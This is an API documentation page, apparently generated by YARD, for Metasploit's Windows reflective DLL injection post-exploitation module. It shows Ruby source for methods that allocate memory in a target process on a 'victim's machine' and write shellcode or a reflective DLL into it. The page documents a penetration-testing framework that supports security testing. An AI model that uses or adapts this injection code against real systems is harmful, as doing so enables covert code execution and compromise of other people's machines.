Module: Msf::Post::Windows::ReflectiveDLLInjection

Includes:
ReflectiveDLLLoader
Defined in:
lib/msf/core/post/windows/reflective_dll_injection.rb

Overview

This module exposes functionality which makes it easier to do Reflective DLL Injection into processes on a victim's machine.

Constant Summary collapse

PAGE_ALIGN =
1024

Instance Method Summary collapse

Methods included from ReflectiveDLLLoader

#load_rdi_dll

Instance Method Details

#inject_dll_into_process(process, dll_path) ⇒ Array

Inject a reflectively-injectable DLL into the given process using reflective injection.

Parameters:

Returns:

  • (Array)

    Tuple of allocated memory address and offset to the ReflectiveLoader function.


53
54
55
56
57
58
# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 53

def inject_dll_into_process(process, dll_path)
  dll, offset = load_rdi_dll(dll_path)
  dll_mem = inject_into_process(process, dll)

  return dll_mem, offset
end

#inject_into_process(process, shellcode) ⇒ Fixnum

Inject the given shellcode into a target process.

Parameters:

Returns:

  • (Fixnum)

    Address of the shellcode in the target process's memory.


28
29
30
31
32
33
34
35
36
37
38
39
40
# File 'lib/msf/core/post/windows/reflective_dll_injection.rb', line 28

def inject_into_process(process, shellcode)
  shellcode_size = shellcode.length

  unless shellcode.length % PAGE_ALIGN == 0
    shellcode_size += PAGE_ALIGN - (shellcode.length % PAGE_ALIGN)
  end

  shellcode_mem = process.memory.allocate(shellcode_size)
  process.memory.protect(shellcode_mem)
  process.memory.write(shellcode_mem, shellcode)

  return shellcode_mem
end